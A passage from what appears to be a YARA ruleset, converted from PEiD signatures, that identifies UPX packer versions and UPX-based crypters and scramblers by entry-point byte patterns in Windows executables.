C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_293_LZMA_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v081_v084_Modified_Laszlo_Markus: PEiD\r\n{\r\n strings:\r\n $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_DLL_Hint_WIN_EP: PEiD\r\n{\r\n strings:\r\n $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 83 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_092_101_COM: PEiD\r\n{\r\n strings:\r\n $a = { 81 FC 00 00 77 02 CD 20 B9 00 00 BE 00 00 BF 00 00 BB 00 80 FD F3 A4 FC 87 F7 83 EE C6 19 ED 57 57 E9 00 00 55 50 58 21 0B 01 04 07 00 00 00 00 00 00 00 00 00 00 00 00 06 00 FF FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPXFreak_V01_HMX0101_additional: PEiD\r\n{\r\n strings:\r\n $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_001_sibaway7yahoocom_additional: PEiD\r\n{\r\n strings:\r\n $a = { E2 FA 94 FF E0 61 00 00 00 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_090_101_EXE: PEiD\r\n{\r\n strings:\r\n $a = { B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8C C8 05 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 12 10 73 E7 92 AF AD 0E 0E 0E 06 1F 07 16 BD 00 00 BB 00 80 55 CB 55 50 58 21 0B 03 03 07 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Delphi_stub: PEiD\r\n{\r\n strings:\r\n $a = { 01 DB 07 8B 1E 83 EE FC 11 DB ED B8 01 ?? ?? ?? 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 }\r\n $b = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF EB 0E ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v30_EXE_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? FF 57 89 E5 8D 9C 24 80 C1 FF FF 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? 00 57 83 C3 04 53 68 ?? ?? ?? 00 56 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V290_Markus_Oberhumer_amp_Laszlo_Molnar_amp_John_Reiser: PEiD\r\n{\r\n strings:\r\n $a = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPXcrypter_archphaseNWC_additional: PEiD\r\n{\r\n strings:\r\n $a = { BF ?? ?? ?? 00 81 FF ?? ?? ?? 00 74 10 81 2F ?? 00 00 00 83 C7 04 BB 05 ?? ?? 00 FF E3 BE ?? ?? ?? 00 FF E6 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v070_Hint_DOS_EP: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 58 83 ?? ?? 50 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 83 ?? ?? 31 DB EB }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_UPX_06_Anorganix_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v072_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 83 ?? ?? 31 DB 5E 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 81 ?? ?? ?? ?? ?? EB }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_UPX_0896_102_105_124_emadicius: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE 00 90 8B 00 8D BE 00 80 B4 FF 57 83 CD FF EB 3A 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B 75 19 8B 1E 83 EE FC 11 DB 72 10 58 61 90 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_062_EXE: PEiD\r\n{\r\n strings:\r\n $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 00 00 00 00 00 0E 0E 00 00 00 00 00 00 00 00 00 00 00 CB 55 50 58 21 07 00 02 07 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_7bit_Scrambler_102: PEiD\r\n{\r\n strings:\r\n $a = { 0F 83 FA }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_092_094_PE_DLL: PEiD\r\n{\r\n strings:\r\n $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE 2B 00 00 00 8D BE D5 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_081_084_PE_DLL: PEiD\r\n{\r\n strings:\r\n $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE D9 00 00 00 8D BE 27 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 09 8B 1E 83 EE FC }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule VisualUPX_02_emadicius: PEiD\r\n{\r\n strings:\r\n $a = { 66 C7 05 ?? ?? ?? 00 75 07 E9 ?? FE FF FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption_MANtiCORE: PEiD\r\n{\r\n strings:\r\n $a = { 60 B8 ?? ?? ?? 00 B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Scrambler_RC_v1x_additional: PEiD\r\n{\r\n strings:\r\n $a = { 66 C7 05 ?? ?? ?? ?? 75 07 E9 ?? FE FF FF 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_081_084_PE: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE 00 00 00 00 8D BE 00 00 00 FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v072: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 83 ?? ?? 31 DB 5E 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 81 ?? ?? ?? ?? ?? EB }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v070: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 83 CD FF 31 DB 5E 8D BE FA FF 57 66 81 87 81 C6 B3 01 EB 0A 8A 06 46 88 07 47 01 DB 75 }\r\n $b = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 EC 01 ?? ?? 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v062_Laszlo_Markus: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 F0 01 ?? ?? 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPXcrypter_archphaseNWC: PEiD\r\n{\r\n strings:\r\n $a = { BF ?? ?? ?? 00 81 FF ?? ?? ?? 00 74 10 81 2F ?? 00 00 00 83 C7 04 BB 05 ?? ?? 00 FF E3 BE ?? ?? ?? 00 FF E6 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption_MANtiCORE_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 B8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8A 14 08 80 F2 ?? 88 14 08 41 83 F9 ?? 75 F1 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104_Modified: PEiD\r\n{\r\n strings:\r\n $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB 8A 07 ?? EB B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule VisualUPX_02_emadicius_additional: PEiD\r\n{\r\n strings:\r\n $a = { 66 C7 05 ?? ?? ?? 00 75 07 E9 ?? FE FF FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V3X_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n strings:\r\n $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPXLock_v11_CyberDoom_Bob: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? 00 60 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v051: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 58 83 E8 3D 50 8D B8 FF 57 8D B0 }\r\n $b = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 8D B0 D8 01 ?? ?? 83 CD FF 31 DB ?? ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 0B 8A 06 46 88 07 47 EB EB 90 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPXFreak_V01_HMX0101: PEiD\r\n{\r\n strings:\r\n $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_290_LZMA: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n $b = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 ?? ?? ?? ?? 90 90 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v0761_pe_exe_Hint_WIN_EP: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 57 83 ?? ?? 31 DB EB }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPXShit_006_additional: PEiD\r\n{\r\n strings:\r\n $a = { B8 ?? ?? 43 00 B9 15 00 00 00 80 34 08 ?? E2 FA E9 D6 FF FF FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104_additional: PEiD\r\n{\r\n strings:\r\n $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB 8A 07 ?? EB B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_062_PE: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 66 81 87 00 00 00 00 00 00 8D B0 F0 01 00 00 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_v072_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 81 C6 B3 01 ?? ?? EB 0A ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_UPX_0896_102_105_124_emadicius: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE 00 90 8B 00 8D BE 00 80 B4 FF 57 83 CD FF EB 3A 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B 75 19 8B 1E 83 EE FC 11 DB 72 10 58 61 90 EB 05 E8 EB 04 40 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v20_Markus_Laszlo_Reiser_h: PEiD\r\n{\r\n strings:\r\n $a = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 }\r\n $b = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule _PseudoSigner_02_UPX_06: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_121_Markus_Laszlo: PEiD\r\n{\r\n strings:\r\n $a = { 31 2E 32 31 00 55 50 58 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_062_PE_DLL: PEiD\r\n{\r\n strings:\r\n $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 58 83 E8 48 50 8D B8 00 00 00 FF 57 66 81 87 00 00 00 00 00 00 8D B0 F8 01 00 00 83 CD FF 31 DB EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V290_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n strings:\r\n $a = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_UPX_06: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Inliner_v10_by_GPcH_additional: PEiD\r\n{\r\n strings:\r\n $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_v01_500mhz_additional: PEiD\r\n{\r\n strings:\r\n $a = { E8 00 00 00 00 5D 8B CD 81 ED 7A 29 40 00 89 AD 0F 6D 40 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_stub: PEiD\r\n{\r\n strings:\r\n $a = { 79 07 0F B7 07 47 50 47 B9 57 48 F2 AE 55 FF 96 84 ?? 00 00 09 C0 74 07 89 03 83 C3 04 EB D8 FF 96 88 ?? 00 00 61 E9 ?? ?? ?? FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modifier_v01x_additional: PEiD\r\n{\r\n strings:\r\n $a = { 50 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_290_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 ?? ?? ?? ?? 90 90 }\r\n $b = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v062: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 58 83 E8 3D 50 8D B8 FF 57 66 81 87 8D B0 EC 01 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 }\r\n $b = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 F0 01 ?? ?? 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_Modified_Stub_c_Farb_rausch_Consumer_Consulting_: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 E8 00 00 00 00 5B 83 C3 66 A4 FF D3 73 FB 31 C9 FF D3 73 14 31 C0 FF D3 73 1D 41 B0 10 FF D3 10 C0 73 FA 75 3C AA EB E2 E8 4A 00 00 00 49 E2 10 E8 40 00 00 00 EB 28 AC D1 E8 74 45 11 C9 EB 1C 91 48 C1 E0 08 AC E8 2A 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 89 E8 56 89 FE 29 C6 F3 A4 5E EB 9F 00 D2 75 05 8A 16 46 10 D2 C3 31 C9 41 FF D3 11 C9 FF D3 72 F8 C3 31 C0 31 DB 31 C9 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F 0E 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 89 D8 E2 D9 8D BE ?? ?? ?? ?? 8B 07 09 C0 74 45 8B 5F 04 8D 84 30 ?? ?? ?? ?? 01 F3 50 83 C7 08 FF 96 ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 79 07 0F B7 07 47 50 47 B9 57 48 F2 AE 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB D8 FF 96 ?? ?? ?? ?? 61 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption_MANtiCORE_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Modified_additional: PEiD\r\n{\r\n strings:\r\n $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Modified: PEiD\r\n{\r\n strings:\r\n $a = { 01 DB 07 8B 1E 83 EE FC 11 DB 8A 07 EB B8 01 ?? ?? ?? 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 }\r\n $b = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v051_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 F0 01 ?? ?? 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_001_dj_siba: PEiD\r\n{\r\n strings:\r\n $a = { 94 BC ?? ?? 43 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61 00 00 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Alternative_stub: PEiD\r\n{\r\n strings:\r\n $a = { 01 DB 07 8B 1E 83 EE FC 11 DB ED B8 01 00 00 00 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_293_300_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption: PEiD\r\n{\r\n strings:\r\n $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104: PEiD\r\n{\r\n strings:\r\n $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }\r\n $b = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_071_072_EXE: PEiD\r\n{\r\n strings:\r\n $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 00 00 00 00 00 0E 0E 00 00 00 00 00 00 00 00 00 00 00 CB 55 50 58 21 09 00 02 07 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Inliner_10_by_GPcH: PEiD\r\n{\r\n strings:\r\n $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D 